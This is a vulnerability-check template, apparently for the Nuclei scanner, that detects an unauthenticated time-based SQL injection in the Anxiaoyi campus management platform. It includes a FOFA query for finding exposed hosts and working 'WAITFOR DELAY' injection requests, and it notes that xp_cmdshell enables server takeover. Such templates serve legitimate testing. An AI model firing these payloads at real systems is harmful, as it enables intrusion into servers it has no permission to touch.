id: anxiaoyi-ADTag_Info_ashx-sql-time

info:
  name: 智慧校园综合管理平台(安校易) ADTag_Info.ashx SQL注入漏洞
  author: Superhero
  severity: high
  description: |-
    fofa: title="智慧综合管理平台登入"
    智慧校园综合管理平台(安校易) ADTag_Info.ashx 接口处存在SQL注入漏洞，未经身份验证的远程攻击者可利用SQL注入漏洞配合数据库xp_cmdshell可以执行任意命令，从而控制服务器。经过分析与研判，该漏洞利用难度低，建议尽快修复。
  reference:
    - https://mp.weixin.qq.com/s/n6cbNkh1BoPhRAlOEIUzbw
  tags: sql injection

http:
  - raw:
      - |
        POST /Module/BPCJ/AD_Tag/Controller/ADTag_Info.ashx HTTP/1.1
        Host: {{Hostname}}
        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:127.0) Gecko/20100101 Firefox/127.0
        Content-type: application/x-www-form-urlencoded

        action=exportExcel&sADId=';WAITFOR+DELAY+'0:0:4'--
      - |
        POST /Module/BPCJ/AD_Tag/Controller/ADTag_Info.ashx HTTP/1.1
        Host: {{Hostname}}
        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:127.0) Gecko/20100101 Firefox/127.0
        Content-type: application/x-www-form-urlencoded

        action=exportExcel&sADId=';WAITFOR+DELAY+'0:0:8'--
    matchers-condition: and
    matchers:
      - type: dsl
        dsl:
          - 'duration_1>=4 && duration_1<=5'  
          - 'duration_2>=8 && duration_2<=9'
        condition: and